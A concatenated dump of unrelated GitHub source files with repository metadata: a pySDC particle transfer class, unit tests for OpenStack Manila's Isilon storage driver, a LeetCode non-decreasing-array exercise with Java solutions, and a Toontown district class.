"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "6394128"
},
{
"name": "Shell",
"bytes": "9250"
}
],
"symlink_target": ""
}
|
from pySDC.Transfer import transfer
from pySDC.datatype_classes.particles import particles, fields
class particles_to_particles(transfer):
"""
    Custom transfer class, implements Transfer.py
    This implementation is just a dummy for particles with no real functionality. It can be used to check whether, in
    the particle setups, the number of iterations is halved once two levels are used.
Attributes:
fine: reference to the fine level
coarse: reference to the coarse level
init_f: number of variables on the fine level (whatever init represents there)
init_c: number of variables on the coarse level (whatever init represents there)
"""
    def __init__(self, fine_level, coarse_level):
"""
Initialization routine
Args:
fine_level: fine level connected with the transfer operations (passed to parent)
coarse_level: coarse level connected with the transfer operations (passed to parent)
"""
        super(particles_to_particles, self).__init__(fine_level, coarse_level)
    def restrict_space(self, F):
"""
Dummy restriction routine
Args:
F: the fine level data (easier to access than via the fine attribute)
"""
        if isinstance(F, particles):
            G = particles(F)
        elif isinstance(F, fields):
            G = fields(F)
        else:
            raise TypeError('Transfer error: cannot restrict data of type %s' % type(F))
        return G
    def prolong_space(self, G):
"""
Dummy prolongation routine
Args:
G: the coarse level data (easier to access than via the coarse attribute)
"""
        if isinstance(G, particles):
            F = particles(G)
        elif isinstance(G, fields):
            F = fields(G)
        else:
            raise TypeError('Transfer error: cannot prolong data of type %s' % type(G))
        return F
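# A minimal sketch of the copy-through behaviour (assuming the particles data
# type of this pySDC version supports copy-construction, as used above):
#
#     trans = particles_to_particles(fine_level, coarse_level)
#     G = trans.restrict_space(F)    # G is an independent copy of F
#     F2 = trans.prolong_space(G)    # likewise just a copy of G
#
# Both operations are identity transfers, which is what makes this class a
# useful dummy for the two-level iteration-count check described above.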
|
{
"content_hash": "f0aa4849764f04f7d861bd8bc3451ba8",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 119,
"avg_line_length": 30.403225806451612,
"alnum_prop": 0.6095490716180372,
"repo_name": "torbjoernk/pySDC",
"id": "047f8977bfa01d4f276412ad12957aba97c378aa",
"size": "1885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/penningtrap/TransferClass.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "279755"
}
],
"symlink_target": ""
}
|
import ddt
import mock
from oslo_log import log
from oslo_utils import units
import six
from manila.common import constants as const
from manila import exception
from manila.share.drivers.dell_emc.plugins.isilon import isilon
from manila.share.drivers.dell_emc.plugins.isilon import isilon_api
from manila import test
LOG = log.getLogger(__name__)
@ddt.ddt
class IsilonTest(test.TestCase):
"""Integration test for the Isilon Manila driver."""
ISILON_ADDR = '10.0.0.1'
API_URL = 'https://%s:8080' % ISILON_ADDR
AUTH = ('admin', 'admin')
ROOT_DIR = '/ifs/manila-test'
SHARE_NAME = 'share-foo'
SHARE_DIR = ROOT_DIR + '/' + SHARE_NAME
ADMIN_HOME_DIR = '/ifs/home/admin'
CLONE_DIR = ROOT_DIR + '/clone-dir'
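    # Note: in the tests below, SMB per-IP access shows up as 'allow:<ip>'
    # entries in a share's host_acl list, while NFS exports track IPs in
    # 'clients' / 'read_only_clients' lists.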
class MockConfig(object):
def safe_get(self, value):
if value == 'emc_nas_server':
return '10.0.0.1'
elif value == 'emc_nas_server_port':
return '8080'
elif value == 'emc_nas_login':
return 'admin'
elif value == 'emc_nas_password':
return 'a'
elif value == 'emc_nas_root_dir':
return '/ifs/manila-test'
else:
return None
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def setUp(self, mock_isi_api):
super(IsilonTest, self).setUp()
self._mock_isilon_api = mock_isi_api.return_value
self.storage_connection = isilon.IsilonStorageConnection(LOG)
self.mock_context = mock.Mock('Context')
self.mock_emc_driver = mock.Mock('EmcDriver')
self.mock_emc_driver.attach_mock(self.MockConfig(), 'configuration')
self.storage_connection.connect(
self.mock_emc_driver, self.mock_context)
def test_allow_access_single_ip_nfs(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
self.storage_connection.allow_access(self.mock_context, share, access,
share_server)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
expected_data = {'clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_nfs_readonly(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RO}
fake_export_id = 70
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'read_only_clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.allow_access(
self.mock_context, share, access, None)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'read_only_clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_nfs_readwrite(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RW}
fake_export_id = 70
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.allow_access(
self.mock_context, share, access, None)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_cifs_ip_readonly(self):
# Note: Driver does not currently support readonly access for "ip" type
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RO}
self.assertRaises(
exception.InvalidShareAccess, self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_deny_access__ip_nfs_readwrite(self):
"""Verifies that an IP will be remove from a whitelist."""
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
# simulate an IP added to the whitelist
ip_addr = '10.0.0.4'
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': [ip_addr]}
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
# call method under test
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
# verify that a call is made to remove an existing IP from the list
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
expected_data = {'clients': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data
)
def test_deny_access__nfs_ip_readonly(self):
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
# simulate an IP added to the whitelist
ip_addr = '10.0.0.4'
self._mock_isilon_api.get_nfs_export.return_value = {
'read_only_clients': [ip_addr]}
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RO}
share_server = None
# call method under test
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
# verify that a call is made to remove an existing IP from the list
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'read_only_clients': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data
)
def test_deny_access_ip_cifs(self):
"""Verifies that an IP will be remove from a whitelist.
Precondition: the IP to be removed exists in the whitelist. Otherwise,
do nothing.
"""
# setup
ip_addr = '10.1.1.10'
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
self._mock_isilon_api.lookup_smb_share.return_value = {
'host_acl': ['allow:' + ip_addr]}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
        # verify an API call is made to remove the IP from the whitelist
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
self.SHARE_NAME)
expected_data = {'host_acl': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_deny_access_nfs_invalid_access_type(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'foo_access_type', 'access_to': '10.0.0.1'}
# This operation should return silently
self.storage_connection.deny_access(
self.mock_context, share, access, None)
def test_deny_access_cifs_invalid_access_type(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {'access_type': 'foo_access_type', 'access_to': '10.0.0.1'}
# This operation should return silently
self.storage_connection.deny_access(self.mock_context, share, access,
None)
def test_deny_access_invalid_share_protocol(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'FOO'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
# This operation should return silently
self.storage_connection.deny_access(
self.mock_context, share, access, None)
def test_deny_access_nfs_export_does_not_exist(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
self._mock_isilon_api.lookup_nfs_export.return_value = 1
self._mock_isilon_api.get_nfs_export.return_value = None
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None
)
def test_deny_access_nfs_share_does_not_exist(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
self._mock_isilon_api.lookup_nfs_export.return_value = None
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None)
def test_deny_access_nfs_share_does_not_contain_required_key(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {
'access_type': 'ip',
'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW,
}
self._mock_isilon_api.get_nfs_export.return_value = {}
self.assertRaises(exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None)
def test_allow_access_multiple_ip_nfs(self):
"""Verifies adding an IP to a whitelist with pre-existing ips.
Verifies that when adding an additional IP to a whitelist which already
contains IPs, the Isilon driver successfully appends the IP to the
whitelist.
"""
# setup
fake_export_id = 42
new_allowed_ip = '10.7.7.8'
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
existing_ips = ['10.0.0.1', '10.1.1.1', '10.0.0.2']
export_json = {
'clients': existing_ips,
'access_level': const.ACCESS_LEVEL_RW,
}
self._mock_isilon_api.get_nfs_export.return_value = export_json
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': new_allowed_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.allow_access(
self.mock_context, share, access, share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
self.assertTrue(self._mock_isilon_api.request.called)
args, kwargs = self._mock_isilon_api.request.call_args
action, url = args
self.assertEqual('PUT', action)
self.assertEqual(expected_url, url)
self.assertEqual(1, len(kwargs))
self.assertIn('data', kwargs)
actual_clients = set(kwargs['data']['clients'])
expected_clients = set(existing_ips)
expected_clients.add(new_allowed_ip)
self.assertEqual(expected_clients, actual_clients)
def test_allow_access_multiple_ip_cifs(self):
"""Verifies adding an IP to a whitelist with pre-existing ips.
Verifies that when adding an additional IP to a whitelist which already
contains IPs, the Isilon driver successfully appends the IP to the
whitelist.
"""
# setup
share_name = self.SHARE_NAME
new_allowed_ip = '10.101.1.1'
existing_ips = ['allow:10.0.0.1', 'allow:10.1.1.1', 'allow:10.0.0.2']
share_json = {'name': share_name, 'host_acl': existing_ips}
self._mock_isilon_api.lookup_smb_share.return_value = share_json
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'ip', 'access_to': new_allowed_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.allow_access(self.mock_context, share,
access,
share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
share_name)
self.assertTrue(self._mock_isilon_api.request.called)
args, kwargs = self._mock_isilon_api.request.call_args
action, url = args
self.assertEqual('PUT', action)
self.assertEqual(expected_url, url)
self.assertEqual(1, len(kwargs))
self.assertIn('data', kwargs)
actual_clients = set(kwargs['data']['host_acl'])
expected_clients = set(existing_ips)
expected_clients.add('allow:' + new_allowed_ip)
self.assertEqual(expected_clients, actual_clients)
def test_allow_access_single_ip_cifs(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'CIFS'}
allow_ip = '10.1.1.10'
access = {'access_type': 'ip', 'access_to': allow_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self._mock_isilon_api.lookup_smb_share.return_value = {
'name': share_name, 'host_acl': []}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
self.storage_connection.allow_access(self.mock_context, share, access,
share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
self.SHARE_NAME)
expected_data = {'host_acl': ['allow:' + allow_ip]}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
@ddt.data(
('foo', const.ACCESS_LEVEL_RW, isilon_api.SmbPermission.rw),
('testuser', const.ACCESS_LEVEL_RO, isilon_api.SmbPermission.ro),
)
def test_allow_access_with_cifs_user(self, data):
# setup
share_name = self.SHARE_NAME
user, access_level, expected_smb_perm = data
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'user',
'access_to': user,
'access_level': access_level}
self.storage_connection.allow_access(self.mock_context, share,
access, None)
self._mock_isilon_api.smb_permissions_add.assert_called_once_with(
share_name, user, expected_smb_perm)
def test_allow_access_with_cifs_user_invalid_access_level(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {
'access_type': 'user',
'access_to': 'foo',
'access_level': 'everything',
}
self.assertRaises(exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_allow_access_with_cifs_invalid_access_type(self):
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'fooaccesstype',
'access_to': 'testuser',
'access_level': const.ACCESS_LEVEL_RW}
self.assertRaises(exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_deny_access_with_cifs_user(self):
share_name = self.SHARE_NAME
user_to_remove = 'testuser'
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'user',
'access_to': user_to_remove,
'access_level': const.ACCESS_LEVEL_RW}
self.assertFalse(self._mock_isilon_api.smb_permissions_remove.called)
self.storage_connection.deny_access(self.mock_context, share, access,
None)
self._mock_isilon_api.smb_permissions_remove.assert_called_with(
share_name, user_to_remove)
def test_allow_access_invalid_access_type(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'NFS'}
allow_ip = '10.1.1.10'
access = {'access_type': 'foo_access_type', 'access_to': allow_ip}
# verify method under test throws the expected exception
self.assertRaises(
exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_allow_access_invalid_share_protocol(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'FOO_PROTOCOL'}
allow_ip = '10.1.1.10'
access = {'access_type': 'ip', 'access_to': allow_ip}
# verify method under test throws the expected exception
self.assertRaises(
exception.InvalidShare, self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_create_share_nfs(self):
share_path = self.SHARE_DIR
self.assertFalse(self._mock_isilon_api.create_directory.called)
self.assertFalse(self._mock_isilon_api.create_nfs_export.called)
# create the share
share = {"name": self.SHARE_NAME, "share_proto": 'NFS', "size": 8}
location = self.storage_connection.create_share(self.mock_context,
share, None)
# verify location and API call made
expected_location = '%s:%s' % (self.ISILON_ADDR, self.SHARE_DIR)
self.assertEqual(expected_location, location)
self._mock_isilon_api.create_directory.assert_called_with(share_path)
self._mock_isilon_api.create_nfs_export.assert_called_with(share_path)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
share_path, 'directory', 8 * units.Gi)
def test_create_share_cifs(self):
self.assertFalse(self._mock_isilon_api.create_directory.called)
self.assertFalse(self._mock_isilon_api.create_smb_share.called)
# create the share
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS', "size": 8}
location = self.storage_connection.create_share(self.mock_context,
share, None)
expected_location = '\\\\{0}\\{1}'.format(
self.ISILON_ADDR, self.SHARE_NAME)
self.assertEqual(expected_location, location)
self._mock_isilon_api.create_directory.assert_called_once_with(
self.SHARE_DIR)
self._mock_isilon_api.create_smb_share.assert_called_once_with(
self.SHARE_NAME, self.SHARE_DIR)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
self.SHARE_DIR, 'directory', 8 * units.Gi)
def test_create_share_invalid_share_protocol(self):
share = {"name": self.SHARE_NAME, "share_proto": 'FOO_PROTOCOL'}
self.assertRaises(
exception.InvalidShare, self.storage_connection.create_share,
self.mock_context, share, share_server=None)
def test_create_share_nfs_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
self._mock_isilon_api.create_nfs_export.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.create_share,
self.mock_context, share, share_server=None)
def test_create_snapshot(self):
# create snapshot
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
self.storage_connection.create_snapshot(self.mock_context, snapshot,
None)
# verify the create snapshot API call is executed
self._mock_isilon_api.create_snapshot.assert_called_with(snapshot_name,
snapshot_path)
def test_create_share_from_snapshot_nfs(self):
# assertions
self.assertFalse(self._mock_isilon_api.create_nfs_export.called)
self.assertFalse(self._mock_isilon_api.clone_snapshot.called)
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
# execute method under test
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
share = {"name": self.SHARE_NAME, "share_proto": 'NFS', 'size': 5}
location = self.storage_connection.create_share_from_snapshot(
self.mock_context, share, snapshot, None)
# verify NFS export created at expected location
self._mock_isilon_api.create_nfs_export.assert_called_with(
self.SHARE_DIR)
# verify clone_directory(container_path) method called
self._mock_isilon_api.clone_snapshot.assert_called_once_with(
snapshot_name, self.SHARE_DIR)
expected_location = '{0}:{1}'.format(
self.ISILON_ADDR, self.SHARE_DIR)
self.assertEqual(expected_location, location)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
self.SHARE_DIR, 'directory', 5 * units.Gi)
def test_create_share_from_snapshot_cifs(self):
# assertions
self.assertFalse(self._mock_isilon_api.create_smb_share.called)
self.assertFalse(self._mock_isilon_api.clone_snapshot.called)
# setup
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
new_share_name = 'clone-dir'
# execute method under test
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
share = {"name": new_share_name, "share_proto": 'CIFS', "size": 2}
location = self.storage_connection.create_share_from_snapshot(
self.mock_context, share, snapshot, None)
# verify call made to create new CIFS share
self._mock_isilon_api.create_smb_share.assert_called_once_with(
new_share_name, self.CLONE_DIR)
self._mock_isilon_api.clone_snapshot.assert_called_once_with(
snapshot_name, self.CLONE_DIR)
expected_location = '\\\\{0}\\{1}'.format(self.ISILON_ADDR,
new_share_name)
self.assertEqual(expected_location, location)
# verify directory quota call made
expected_share_path = '{0}/{1}'.format(self.ROOT_DIR, new_share_name)
self._mock_isilon_api.quota_create.assert_called_with(
expected_share_path, 'directory', 2 * units.Gi)
def test_delete_share_nfs(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
fake_share_num = 42
self._mock_isilon_api.lookup_nfs_export.return_value = fake_share_num
self.assertFalse(self._mock_isilon_api.delete_nfs_share.called)
# delete the share
self.storage_connection.delete_share(self.mock_context, share, None)
# verify share delete
self._mock_isilon_api.delete_nfs_share.assert_called_with(
fake_share_num)
def test_delete_share_cifs(self):
self.assertFalse(self._mock_isilon_api.delete_smb_share.called)
# delete the share
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self.storage_connection.delete_share(self.mock_context, share, None)
# verify share deleted
self._mock_isilon_api.delete_smb_share.assert_called_with(
self.SHARE_NAME)
def test_delete_share_invalid_share_proto(self):
share = {"name": self.SHARE_NAME, "share_proto": 'FOO_PROTOCOL'}
self.assertRaises(
exception.InvalidShare, self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_nfs_share_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
self._mock_isilon_api.delete_nfs_share.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_nfs_share_share_does_not_exist(self):
self._mock_isilon_api.lookup_nfs_export.return_value = None
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
        # verify that calling delete on a non-existent share returns without
        # raising an exception
self.storage_connection.delete_share(self.mock_context, share, None)
def test_delete_cifs_share_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self._mock_isilon_api.delete_smb_share.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_cifs_share_share_does_not_exist(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self._mock_isilon_api.lookup_smb_share.return_value = None
        # verify that calling delete on a non-existent share returns without
        # raising an exception
self.storage_connection.delete_share(self.mock_context, share, None)
def test_delete_snapshot(self):
# create a snapshot
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
self.assertFalse(self._mock_isilon_api.delete_snapshot.called)
# delete the created snapshot
self.storage_connection.delete_snapshot(self.mock_context, snapshot,
None)
# verify the API call was made to delete the snapshot
self._mock_isilon_api.delete_snapshot.assert_called_once_with(
snapshot_name)
def test_ensure_share(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self.storage_connection.ensure_share(self.mock_context, share, None)
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def test_connect(self, mock_isi_api):
storage_connection = isilon.IsilonStorageConnection(LOG)
# execute method under test
storage_connection.connect(
self.mock_emc_driver, self.mock_context)
# verify connect sets driver params appropriately
mock_config = self.MockConfig()
server_addr = mock_config.safe_get('emc_nas_server')
self.assertEqual(server_addr, storage_connection._server)
expected_port = int(mock_config.safe_get('emc_nas_server_port'))
self.assertEqual(expected_port, storage_connection._port)
self.assertEqual('https://{0}:{1}'.format(server_addr, expected_port),
storage_connection._server_url)
expected_username = mock_config.safe_get('emc_nas_login')
self.assertEqual(expected_username, storage_connection._username)
expected_password = mock_config.safe_get('emc_nas_password')
self.assertEqual(expected_password, storage_connection._password)
self.assertFalse(storage_connection._verify_ssl_cert)
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def test_connect_root_dir_does_not_exist(self, mock_isi_api):
mock_isilon_api = mock_isi_api.return_value
mock_isilon_api.is_path_existent.return_value = False
storage_connection = isilon.IsilonStorageConnection(LOG)
# call method under test
storage_connection.connect(self.mock_emc_driver, self.mock_context)
mock_isilon_api.create_directory.assert_called_once_with(
self.ROOT_DIR, recursive=True)
def test_update_share_stats(self):
stats_dict = {}
self.storage_connection.update_share_stats(stats_dict)
expected_version = isilon.VERSION
self.assertEqual({'driver_version': expected_version}, stats_dict)
def test_get_network_allocations_number(self):
# call method under test
num = self.storage_connection.get_network_allocations_number()
self.assertEqual(0, num)
def test_extend_share(self):
quota_id = 'abcdef'
new_share_size = 8
share = {
"name": self.SHARE_NAME,
"share_proto": 'NFS',
"size": new_share_size
}
self._mock_isilon_api.quota_get.return_value = {'id': quota_id}
self.assertFalse(self._mock_isilon_api.quota_set.called)
self.storage_connection.extend_share(share, new_share_size)
share_path = '{0}/{1}'.format(self.ROOT_DIR, self.SHARE_NAME)
expected_quota_size = new_share_size * units.Gi
self._mock_isilon_api.quota_set.assert_called_once_with(
share_path, 'directory', expected_quota_size)
|
{
"content_hash": "dd0c09ce84abed046a9a530424813af5",
"timestamp": "",
"source": "github",
"line_count": 751,
"max_line_length": 79,
"avg_line_length": 42.271637816245004,
"alnum_prop": 0.601083601083601,
"repo_name": "vponomaryov/manila",
"id": "777a18bc60a24cb71e604790c6adf5070ff3eccd",
"size": "32350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/share/drivers/dell_emc/plugins/isilon/test_isilon.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "9697997"
},
{
"name": "Shell",
"bytes": "103800"
}
],
"symlink_target": ""
}
|
__source__ = 'https://leetcode.com/problems/non-decreasing-array/'
# Time: O(N)
# Space: O(1)
#
# Description: Leetcode # 665. Non-decreasing Array
#
# Given an array with n integers,
# your task is to check if it could become non-decreasing by modifying at most 1 element.
#
# We define an array to be non-decreasing if array[i] <= array[i + 1] holds for every i (1 <= i < n).
#
# Example 1:
# Input: [4,2,3]
# Output: True
# Explanation: You could modify the first 4 to 1 to get a non-decreasing array.
# Example 2:
# Input: [4,2,1]
# Output: False
# Explanation: You can't get a non-decreasing array by modifying at most one element.
# Note: n is in the range [1, 10,000].
# Companies
# Google
# Related Topics
# Array
#
import unittest
class Solution(object):
pass # your function here
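# Illustrative Python translation (not in the original file) of the greedy
# O(n) approach used by the first Java solution quoted below: walk the array
# once, count violations, and repair each one in place, preferring to lower
# nums[i - 1] so later elements keep the most room.
class SolutionSketch(object):
    def checkPossibility(self, nums):
        cnt = 0
        for i in range(1, len(nums)):
            if nums[i - 1] > nums[i]:
                cnt += 1
                if cnt > 1:
                    return False
                if i - 2 < 0 or nums[i - 2] <= nums[i]:
                    nums[i - 1] = nums[i]  # prefer modifying nums[i - 1]
                else:
                    nums[i] = nums[i - 1]  # have to modify nums[i]
        return True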
class TestMethods(unittest.TestCase):
    def test_Local(self):
        # exercise the sketch above on the two examples from the description
        self.assertTrue(SolutionSketch().checkPossibility([4, 2, 3]))
        self.assertFalse(SolutionSketch().checkPossibility([4, 2, 1]))
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/non-decreasing-array/solution/
# 9ms 99.39%
class Solution {
public boolean checkPossibility(int[] nums) {
int cnt = 0; //the number of changes
for(int i = 1; i < nums.length && cnt<=1 ; i++){
if(nums[i-1] > nums[i]){
cnt++;
                if (i - 2 < 0 || nums[i-2] <= nums[i]) nums[i-1] = nums[i]; // prefer to modify nums[i-1]
                else nums[i] = nums[i-1]; // have to modify nums[i]
}
}
return cnt<=1;
}
}
# 10ms 89.96%
class Solution {
public boolean checkPossibility(int[] nums) {
if(nums == null || nums.length < 2)
return true;
boolean change = true;
int start = 0;
int last = nums[start];
start = 1;
while(start < nums.length){
int current = nums[start];
if (last <= current){
last = current;
start++;
continue;
}
if(change){
if(start-2 < 0 || current > nums[start - 2])
last = current;
change = false;
start++;
}
else
return false;
}
return true;
}
}
'''
|
{
"content_hash": "a27f22b4a51c981666632cb364b45a8f",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 103,
"avg_line_length": 25.224719101123597,
"alnum_prop": 0.5363028953229398,
"repo_name": "JulyKikuAkita/PythonPrac",
"id": "2cf80b74bcd6f8775c9a89b38e7db2440b75400b",
"size": "2245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cs15211/Non-decreasingArray.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "191608"
},
{
"name": "HTML",
"bytes": "647778"
},
{
"name": "Python",
"bytes": "5429558"
}
],
"symlink_target": ""
}
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
from otp.distributed import DistributedDistrict
class ToontownDistrict(DistributedDistrict.DistributedDistrict):
notify = DirectNotifyGlobal.directNotify.newCategory('ToontownDistrict')
    def __init__(self, cr):
        DistributedDistrict.DistributedDistrict.__init__(self, cr)
        self.avatarCount = 0
        self.newAvatarCount = 0
        # default so getAllowAHNNLog cannot raise AttributeError if it runs
        # before allowAHNNLog has been called
        self.allowAHNN = 0
def allowAHNNLog(self, allow):
self.allowAHNN = allow
def getAllowAHNNLog(self):
return self.allowAHNN
|
{
"content_hash": "66d1ae22f32781f331acf2b151d2189b",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 76,
"avg_line_length": 33.94117647058823,
"alnum_prop": 0.7521663778162911,
"repo_name": "ksmit799/Toontown-Source",
